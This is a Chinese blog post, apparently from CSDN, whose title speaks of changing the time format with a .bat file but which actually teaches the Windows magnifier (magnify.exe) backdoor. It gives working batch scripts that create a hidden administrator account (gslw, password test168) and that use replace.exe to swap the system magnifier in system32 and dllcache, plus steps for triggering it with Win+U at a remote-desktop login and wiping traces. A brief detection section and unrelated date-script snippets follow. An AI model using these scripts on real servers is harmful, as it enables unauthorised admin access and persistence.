如何做个bat文件改变系统时间格式_Windows系统之放大镜后门

最新推荐文章于 2024-06-02 09:31:32 发布
最新推荐文章于 2024-06-02 09:31:32 发布
阅读量562 收藏
点赞数
文章标签: 如何做个bat文件改变系统时间格式
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39538789/article/details/111378829
版权

团队:Admin_Team

作者:f0ng

0x00 构造

1.放大镜后门与shift后门运用原理相同。

首先将C:WINDOWSsystem32dllcache 下的 magnify.exe 删除,然后将C:WINDOWSsystem32 下的 cmd.exe 移动到C:WINDOWSsystem32dllcache并更名为 magnify.exe ,且在 C:WINDOWSsystem32 下删除存在的magnify.exe, 将修改过后的magnify.exe 移动至 C:WINDOWSsystem32

dbaf11ce4b2888b9d8b8336a4eabc9df.png

只是触发的方式更改了,win+U触发(这里我自己在windows2003登录页面进行win+R触发,没有成功)

2. 网上看到的一个知识点,批处理:

(1).构造批处理脚本

@echo off
net user gslw test168 /add
net localgroup administrators gslw /add
%Windir%system32magnify.exe
exit

将上面的脚本保存为 magnify.bat,其作用是创建一个密码为test168的管理员用户 gslw$,最后运行改名后的放大镜程序 magnify.exe

bc1efa358aa108f20784a2621a5d9db5.png

(由于是一闪而过,所以截图到得是没有运行。)

49adf8d34f6a361a65c5ad72318f2a23.png

(2).文件格式转换

  因为批处理文件 magnify.bat 的后缀是 bat ,必须要将其转换为同名的 exe 文件才可以通过组合键 Win+U 调用。攻击者一般可以利用 WinRar构造一个自动解压的 exe 压缩文件,当然也可以利用 bat2com 进行文件格式的转换。我们就以后面的方法为例进行演示。

c5ba132a55546d7dbc330c7c6675b540.png

(进行编译,出现 magnify.exe 。)

440d5246ebc9a25d116563b5b1f6668a.png

(3).放大镜文件替换

  下面就需要用构造的 magnify.exe 替换同名的放大镜程序文件,由于 Windows 对系统文件的自我保护,因此不能直接替换,不过 Windows 提供了一个命令 replace.exe ,通过它我们可以替换系统文件。

另外,由于系统文件在 %Windir%system32dllcache 中有备份,为了防止文件替换后又重新还原,所以我们首先要替换该目录下的 magnify.exe 文件。假设构造的 magnify.exe 文件在 %Windir% 目录下,我们可以通过一个批处理即可实现文件的替换。

@echo off
copy %Windir%system32dllcachemagnify.exe nagnify.exe
copy %Windir%system32magnify.exe nagnify.exe
replace.exe %Windir%magnify.exe %Windir%system32dllcache
replace.exe %Windir%magnify.exe %Windir%system32
exit

(上面批处理的功能是,首先将放大镜程序备份为 nagnify.exe ,然后用同名的构造程序将其替换。)

6122ede56bce1a1a80fda1f18e0e614f.png

(qqq.bat为批处理文件,magnify.exe为运行qqq.bat出现的文件。)

(4).攻击利用

  当完成上述操作后,一个放大镜后门就做成了。然后攻击者通过远程桌面连接服务器,在登录界面窗口摁下本地键盘的 “Win+U” 组合键,选择运行其中的“放大镜”,此刻就在服务器上创建了一个管理员用户 gslw$并打开了放大镜工具,然后攻击者就可以通过该帐户登录服务器。当然,攻击者在断开登录前会删除所有与该帐户相关的信息,以防被管理员发现。

b1fec6094f36aa556ce8712c5368188c.png

(可以看到gslw用户被加入。)

(5).防范措施

  进入 %Windir%system32 查看 magnify.exe 的文件图标是否是原来的放大镜的图标,如果不是的话极有可能被植入了放大镜后门。当然,有的时候攻击者也会将其文件图标更改为和原放大镜程序的图标一样。

此时我们可以查看 magnify.exe 文件的大小和修改时间,如果这两样有一项不符就比较怀疑了。我们也可以先运行 magnify.exe ,然后运行 lusrmgr.msc 查看是否有可疑的用户。如果确定服务器被放置了放大镜后门,首先要删除该文件,然后恢复正常的放大镜程序。当然,我们也可以做得更彻底一些,用一个无关紧要的程序替换放大镜程序。甚至我们也可以以其人之道还治其人之身,构造一个 magnify.exe,通过其警告攻击者或者进行入侵监控和取证。

知识点注解:

.bat 注解

1.@echo off

不显示路径,关闭回显

ca16247c12df1d12300e167a36d2a406.png


2.windows 命令注解

 net user gslw test168 /add     //添加用户名为gslw,密码为test168用户
 net localgroup administrators gslw /add    //添加用户gslw进入administrator组

copy %Windir%system32dllcachemagnify.exe nagnify.exe    //复制,类似于linux上的cp

13d4dfdc856e525ea6093e07ac7bda25.png 
replace.exe %Windir%magnify.exe %Windir%system32 //替换,见下面示例

示例:

5c0e53bfb929fb7d4886d2412f8494f2.png

(C:test1.txt内容如上图 test11111111。)

c4ba92950c7e0526f9ff051217c68c6c.png

(C:wmpubtest1.txt内容如上图 test2222222。)

d21786b6e198069ba43e65a5d421ce3c.png

(test.bat内容如上。)

2547fa92cf7004e1ad765bdabc989431.png

(运行test.bat后如上图。)

由此可知replace.exe可以进行文件替换,但是第一个值为文件名,第二个值必须为路径名,且必须为同名,否则不行。

扫码关注公众号

fc9edc0fb425df1e9a47c1c6da825eff.png
weixin_39538789
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BAT批处理)请问通过批处理打开某程序前修改系统到指定时间
weixin_44181791的博客
11-30 944
不清楚你的实际文件/情况,仅以问题中的说明及猜测为据;以下代码复制粘贴到记事本,另存为xx.bat,编码选ANSI。请问通过批处理打开某程序前修改系统到指定时间,当检测到程序进程运行后 过10分钟自动将时间恢复到原时间
windows修改电脑时间BAT,修改成指定的时间,恢复到现在的时间
10-13
标题提到的"windows修改电脑时间BAT"就是一个这样的解决方案,它允许用户通过简单的命令来设定特定的时间,然后在使用完毕后恢复到当前时间。 首先,我们需要了解批处理脚本是什么。批处理脚本是基于DOS命令行的...
bat批处理日期时间格式设置使用
热门推荐
CatEatApple的专栏
07-21 2万+
bat批处理日期时间格式设置使用小结。 @echo off @title 字符串的编辑测试(下面描述用的箭头→ ← 分别表示向右、向左的意思) set aa=1234567890 echo 说明:下面复合变量中,逗号前的数字表示指针偏移量,逗号后的数字表示提取的字符长度 echo %aa:~1,5% //指针向右→偏移1位,然后从指针处开始向右→提取5个字符.
bat】zip命令压缩某一文件夹下所有文件文件名以日期为后缀
m0_53391462的博客
04-24 2980
递归文件夹下所有文件,压缩,压缩文件夹命名后缀为当前年月日时分秒
一键修改电脑时间bat脚本
weixin_63093824的博客
06-02 340
打开修改时间脚本后若是按了ctrl+c y 后,恢复时间脚本就不会生效,此时要不自己手动恢复,或者继续打开修改时间脚本 按下ctrl+c 然后选择N 第二个脚本就可以啦。最近给女朋友下了一个办公软件,每次必须将时间修改成2015年,自己修改又太麻烦,写了个文件,挺简单的,但是刚开始网上找了很多无法修改,麻烦自己写了一个。写一个txt文本将其复制进去,然后保存,把文件后缀修改为 xx文件。注意需要用右键管理员模式打开。管理员运行后直接关闭即可。适用于windows。
Windows一键添加命名后缀(文件)
我与岁月的森林的博客
10-29 825
Windows一键添加命名后缀(文件)
Windows中通过bat脚本修改系统默认日期与时间
yuanjinshenglife的专栏
04-25 1055
Windows中通过bat脚本修改系统默认日期与时间
我用bat了一个系统工具箱
最新发布
06-11
LUX系统工具箱的草稿,初一学生自学三天的结果
恢复Windows系统.bat文件的默认打开方式
03-30
恢复Windows系统.bat文件的默认打开方式,若默认打开方式被修改,可以将其导入Windows注册表。
修改Windows系统日期.bat
08-22
Python实现爬虫项目
bat.rar_bat_dos bat文件处理
09-23
标题中的“bat.rar_bat_dos bat文件处理”暗示了这个压缩包文件包含与DOS操作系统下的批处理(BAT文件处理相关的资源。批处理文件是包含一系列命令的文本文件,用于自动化执行Windows或DOS操作系统中的任务。这些...
2016测试可用修改同步电脑时间为北京时间bat
09-06
2016测试可用修改同步http://u.download.csdn.net/images/btn_submit.png电脑时间为北京时间bat,亲测可用的bat绝对好用。bat修改电脑时间bat同步北京时间,自动同步时间
解决测试版过期\修改系统日期的批处理
12-19
此压缩包内含3个批处理文件 1.修改系统时间 2.同步服务器时间 3.整合,跳过验证后恢复时间 自己编写批处理内容 1)cd "C:\Program Files\Adobe\Reader 10.0\Reader" “ ”中的内容换成程序安装的路径 2)start AcroRd32.exe start 后的换成程序的应用名称
BAT脚本时间格式
loveheronly的专栏
03-19 2393
获取yyyyMMdd格式的 (1)中文操作系统set strDate=webroot_%Date:~0,4%%Date:~5,2%%Date:~8,2% (2)英文操作系统set strDate=webroot_%Date:~10,14%%Date:~4,2%%Date:~7,2%
BAT自动校对时间脚本,让WINDOWS系统自动校对时间
定期分享编程干货~
07-15 4393
电脑自动校对时间的方法。一招搞定windows系统不能自动校对时间的问题!原文地址:bat自动校对时间脚本,让windows系统自动校对时间 - 方包博客 - java|python|前端开发|运维|电商|ui设计小编方包最近的电脑主机由于电脑里面的“记忆时间的电池”没电了,又懒得换“电池”。于是自己搜一下如何校对时间,但是网上的都是教时间和日期这里设置校对时间!如下,在“internet设置”里...
批处理获取当前系统日期及时间及星期转换为数字并加以格式美化的bat代码
轶软工作室
09-12 4668
批处理获取当前系统日期及时间及星期转换为数字并加以格式美化的bat代码,批处理bat转换星期为数字,批处理bat小时补零,批处理bat时间日期代码如下:
bat 脚本时间格式
chang200002的博客
03-13 262
windows, bat, date格式化,字符串截取。
Windows修改日期批处理
weixin_45145710的博客
05-31 2324
::用法:name.cmd 20170530 (其中name.cmd为以下命令保存的脚本名) ::获取管理员权限 %Windir%\System32\FLTMC.exe >nul 2>&1 || ( IF EXIST "%TEMP%\AdminRun.vbs" DEL /f /q "%TEMP%\AdminRun.vbs" 2>nul ECHO Cre...
3.bat中date命令问题
借风拥你
10-27 1062
在命令行界面使用date命令查看日期格式为:Thu 11/03/2011 发现一个问题。就是相同版本的windows server服务器获取的结果不同: 结果1:Thu 11/03/2011 结果2: 11/03/2011 Thu 虽然可以通过字符串截取获取想要的结果,但是这样脚本中不能同时满足这两种情况。所幸调整了date 命令显示结果的格式 方法: 控制面板–>时钟和区域–>设置时间和日期–>更改日期和时间–>日期 将短日期格式yyyy-M-d 修改为yyyy-MM-dd后,d
windows启动更改系统时间bat
12-19
您好,要修改Windows启动时系统时间bat文件,您可以按照以下步骤进行操作: 首先,您需要创建一个新的文本文件,可以将其命名为“change_time.bat”。 然后,您可以使用记事本或其他文本编辑器打开该文件,并...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值